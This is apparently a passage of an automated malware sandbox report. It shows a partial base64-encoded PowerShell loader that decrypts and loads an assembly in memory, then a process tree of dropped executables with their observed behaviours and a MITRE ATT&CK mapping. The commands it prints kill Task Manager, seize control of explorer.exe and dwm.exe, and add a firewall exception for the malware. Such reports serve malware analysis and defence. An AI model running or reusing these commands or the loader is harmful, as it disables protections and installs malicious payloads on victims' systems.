YGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2852
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im taskmgr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\wimloader.dll
    wimloader.dll
    3⤵
    - Executes dropped EXE
    PID:3496
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_56d97057-85ea-4f7f-884b-6171122918b9\caller.cmd" "
      4⤵
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\ac3.exe
    ac3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: GetForegroundWindowSpam
    PID:3932
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\shell1.ps1"
    3⤵
    PID:328
- - C:\Windows\SysWOW64\PING.EXE
    ping trustsentry.com -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:348
- - C:\Windows\SysWOW64\PING.EXE
    ping ya.ru -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2928
- - C:\Windows\SysWOW64\PING.EXE
    ping tria.ge -t -n 1 -s 4 -4
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3240
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy bloatware C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:2860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy beastify.url C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:3212
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy shell1.ps1 C:\Users\Admin\Desktop
    3⤵
    - System Location Discovery: System Language Discovery
    - Enumerates system info in registry
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /R /F C:\Windows\explorer.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - System Location Discovery: System Language Discovery
    PID:2832
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\Windows\explorer.exe /grant Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /R /F C:\Windows\System32\dwm.exe
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3256
- - C:\Windows\SysWOW64\icacls.exe
    icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy xcer.cer C:\Users\Admin\Desktop
    3⤵
    - Enumerates system info in registry
    PID:3496
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:972
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:236
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\freebobux.exe
    freebobux.exe
    3⤵
    - Executes dropped EXE
    PID:3464
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\FAD3.tmp\freebobux.bat""
      4⤵
      Loads dropped DLL
      PID:2372
    - - C:\Users\Admin\AppData\Local\Temp\FAD3.tmp\CLWCP.exe
        
        clwcp c:\temp\bg.bmp
        5⤵
        Executes dropped EXE
        Sets desktop wallpaper using registry
        
        PID:3180
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FAD3.tmp\x.vbs"
        5⤵
        
        PID:3540
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\SolaraBootstraper.exe
    SolaraBootstraper.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1940
  - - C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4084
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
      "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      PID:1972
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im ctfmon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\wim.dll
    wim.dll
    3⤵
    - Executes dropped EXE
    PID:2464
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_9753adef-0542-4d6a-9507-dca60100a906\load.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2712
    - - C:\Program Files\VideoLAN\VLC\vlc.exe
        
        "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_9753adef-0542-4d6a-9507-dca60100a906\cringe.mp4"
        5⤵
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:3236
    - - C:\Windows\SysWOW64\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_9753adef-0542-4d6a-9507-dca60100a906\lol.ini
        5⤵
        
        PID:616
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_9753adef-0542-4d6a-9507-dca60100a906\mailgooglecom.json
        5⤵
        Modifies registry class
        
        PID:2760
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_9753adef-0542-4d6a-9507-dca60100a906\CLOCK.py
        5⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:3788
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\xcer.cer
    3⤵
    PID:3876
- - C:\Users\Admin\AppData\Local\Temp\vir_a53c6808-bb5d-4305-a9a4-2685d5b3169c\f3cb220f1aaa32ca310586e5f62dcab1.exe
    f3cb220f1aaa32ca310586e5f62dcab1.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3940
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2204

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2668
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2668 CREDAT:275457 /prefetch:2
  2⤵
  - Manipulates Digital Signatures
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2744

C:\Windows\system32\efsui.exe
efsui.exe /efs /keybackup
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2872

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
1⤵
PID:2508

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /info dwnl-task-25373
1⤵
PID:3216

C:\Windows\SysWOW64\findstr.exe
findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
1⤵
PID:3312

C:\Windows\SysWOW64\findstr.exe
findstr /R /V "^$"
1⤵
PID:2404

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Scheduled Task

Persistence

BITS Jobs

T1197

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

BITS Jobs

T1197

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Password Policy Discovery

T1201

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery